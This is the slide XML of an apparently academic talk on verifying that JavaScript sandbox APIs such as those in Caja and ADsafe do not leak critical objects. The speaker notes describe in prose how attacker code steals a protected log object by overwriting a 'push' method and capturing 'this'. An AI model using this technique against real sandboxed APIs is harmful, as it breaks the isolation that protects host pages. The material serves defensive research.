            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>FBJS,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Yahoo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Adsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>trusted hosting page code that is loaded first and we want to bring in untrusted code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>First trusted code creates an API that provides restricted or mediated access to the protected resource. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Untrusted code is then filtered and rewritten so that it only has access to the API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This filtered and rewritten code is then brought into the page.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lets take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a closer look at how mediated access works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>som</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>resources that we want untrusted code to only have restricted access to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These resources may have some critical objects like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which must never be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>possessed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>untrusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>However it is fine for untrusted code to access just the hostname string of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>location </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>obhect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>so we expose the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>getHostName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> function on the API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This system is secure if we have two properties: untrusted code Is appropriately sandboxed so that it can only </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>access the API and that the API does not leak any critical object. The second point is quite subtle and we illustrate it using </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>our next example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to provide a write-only log facility to untrusted code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So we provide a push method on the API that allows untrusted code to push content on the log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If untrusted code is sandboxed then this mechanism should work correctly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As untrusted code cannot directly reach the log and the API only provides write-access.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Following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this reasoning we can also expose a store method that take an index and a value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>and stores the value at the particular index of the log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This API however is leaky and here is  way to extract a reference  to the log out of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The attacker calls the store method with the index as the string “push” and and a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Which steals the this value passed to it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>When the attacker then calls push, the attacker’s function gets called with the log as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The this value which then gets stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So manual code review is clearly insufficient for establishing correctness of APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And we need an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>automated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>technique to check for all possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>interleavings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we have two problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> – the sandboxing problem which is to design a sandbox for untrusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>that ensures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>that it can only access the API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API confinement – API does not leak, no sandboxed untrusted program can use the API to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>obtain a critical reference. Sandboxing problem is a problem that we solve once for the language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but APIs are policy specific and we will have to establish confinement each time we write an API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There has been a lot of work in the past on solving the sandboxing problem for various fragments of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>JS, but there been very little work on solving the confinement problem.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> shown here, we provide untrusted code with an API with just one function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We want to verify that untrusted code cannot perform any action that can lead to a direct access to a critical resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Among the various actions, untrusted code can invoke it and then obtain a reference to some resource say r2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then it can directly access it and obtain references to other reachable resources,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In this case r3 and r4. Then it can side-effect say r4 with one of its own objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>say u1. Now the semantics of the function f1 might have changed and so that attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>can get hold of new things by invoking it again and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The key point is that the problem is quite complex and there is a big</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Precision –scalability trade-off.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0929A-3812-B543-9319-314D326FF50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 cap="rnd">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst/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BA04-942C-4241-BAE9-61D8178A0E21}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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7243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solidFill>
            <a:schemeClr val="tx2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Ankur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Taly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solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41F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>
            <a:off x="1981200" y="4953000"/>
            <a:ext cx="1752600" cy="6858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urier"/>
            </a:endParaRPr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0" y="6356350"/>
            <a:ext cx="2590800" cy="50165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Ankur Taly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686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590800" cy="50165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E3E5E4E4-8AA7-3E49-81E1-A9D0BEC9EE60}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/15/12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50165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590800" cy="50165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60403989-3EFF-4C4D-9A9D-F370A7D41F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df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df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hyperlink" Target="http://adnetwork.com/ad1.j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429000"/>
            <a:ext cx="70866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sz="4160" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ankur Taly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4160" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stanford  University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Joint work with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Úlfar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Erlingsson, John C. Mitchell, Mark S. Miller and Jasvir Nagra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solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41FF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85800" y="1524000"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="round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Automated Encapsulation Analysis of Security-Critical APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6356350"/>
            <a:ext cx="2590800" cy="50165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Ankur Taly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Properties of API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-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Code is part of the trusted computing  base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Small in size, relative to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Written in a disciplined manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Developers have an incentive in keeping the code simple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3752672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Insights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: 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Conservative and scalable static analysis techniques can do well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Can soundly establish API Confinement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Can warn developers away from using complex coding patterns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144000" cy="2590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language </a:t>
            </a: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Sandboxing technique for untrusted </a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code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Procedure for verifying confinement of </a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> APIs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Applications   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0"/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Standardized JavaScript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724399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 3 (ES3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 5 (ES5) – released in Dec 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ES5-strict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600" y="2514603"/>
          <a:ext cx="7162800" cy="34289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2349"/>
                <a:gridCol w="2960451"/>
              </a:tblGrid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Restriction (relative to ES3)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Rationale</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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delete</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> on variable names</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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2400"/>
                        </a:spcAft>
                      </a:pPr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prototypes for scope objects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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557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with</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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557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this coercion</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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35576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Safe built-ins functions</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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.caller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.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>callee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500" dirty="0" smtClean="0"/>
                        <a:t>on </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>arguments</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t> object</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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No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.caller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smtClean="0">
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>.arguments </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
                        <a:t>on </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t> objects</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1500" dirty="0" smtClean="0">
                        <a:latin typeface="Courier"/>
                        <a:cs typeface="Courier"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="15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arguments and formal parameters</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> aliasing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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66800" y="5955268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Figure 1 from paper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3276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Lexical Scoping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81600" y="41910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Isolation of Global Object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5105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Closure-Based Encapsulation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r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>language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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ES5-strict with three more restrictions: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800" dirty="0" smtClean="0"/>
              <a:t>Immutable built-in objects (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)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800" dirty="0" smtClean="0"/>
              <a:t>No support for “setters &amp; getters”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800" dirty="0" smtClean="0"/>
              <a:t>Only scope-bounded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Practical to implement within ES5-strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 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Scope-bounded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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52400" y="2801035"/>
            <a:ext cx="7772400" cy="856565"/>
            <a:chOff x="152400" y="2801035"/>
            <a:chExt cx="7772400" cy="1104974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52400" y="2801035"/>
              <a:ext cx="7543800" cy="1104974"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -12725"/>
                <a:gd name="adj2" fmla="val -16166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urier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2400" y="3002340"/>
              <a:ext cx="7772400" cy="595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/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Example</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>eval(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>“function(){return</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>}”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="240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x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)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553200" y="1803976"/>
            <a:ext cx="249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Explicitly list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free variables of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000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rot="10800000">
            <a:off x="5135100" y="1803976"/>
            <a:ext cx="1418100" cy="329624"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0000FF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200" y="3810000"/>
            <a:ext cx="8534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000" dirty="0" smtClean="0"/>
              <a:t> Run-time restriction: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)) ⊆{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0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3200" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1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3200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
